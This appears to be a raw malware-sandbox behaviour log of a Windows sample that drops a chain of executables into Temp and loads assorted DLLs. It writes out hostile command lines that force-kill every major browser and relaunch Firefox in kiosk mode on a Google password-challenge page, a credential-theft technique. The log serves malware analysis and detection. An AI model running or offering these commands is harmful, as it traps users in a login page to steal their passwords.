Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001245001\num.exe "C:\Users\user\AppData\Local\Temp\1001245001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2168 -parentBuildID 20230927232528 -prefsHandle 2076 -prefMapHandle 2068 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1627ebda-6589-45a8-9dca-43cec3b82382} 7056 "\\.\pipe\gecko-crash-server-pipe.7056" 2557826ed10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2752 -parentBuildID 20230927232528 -prefsHandle 4376 -prefMapHandle 4372 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {776ea994-b651-49e2-8a85-deca857d51f8} 7056 "\\.\pipe\gecko-crash-server-pipe.7056" 2550a5cf510 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe "C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe"
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process created: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe "C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe "C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe"
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process created: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe "C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe"
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process created: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe "C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001245001\num.exe "C:\Users\user\AppData\Local\Temp\1001245001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe "C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe"
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe "C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe "C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe "C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe "C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe "C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe "C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001245001\num.exe "C:\Users\user\AppData\Local\Temp\1001245001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process created: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe "C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe"
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process created: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe "C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe"
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process created: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe "C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe"
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2168 -parentBuildID 20230927232528 -prefsHandle 2076 -prefMapHandle 2068 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1627ebda-6589-45a8-9dca-43cec3b82382} 7056 "\\.\pipe\gecko-crash-server-pipe.7056" 2557826ed10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2752 -parentBuildID 20230927232528 -prefsHandle 4376 -prefMapHandle 4372 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {776ea994-b651-49e2-8a85-deca857d51f8} 7056 "\\.\pipe\gecko-crash-server-pipe.7056" 2550a5cf510 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
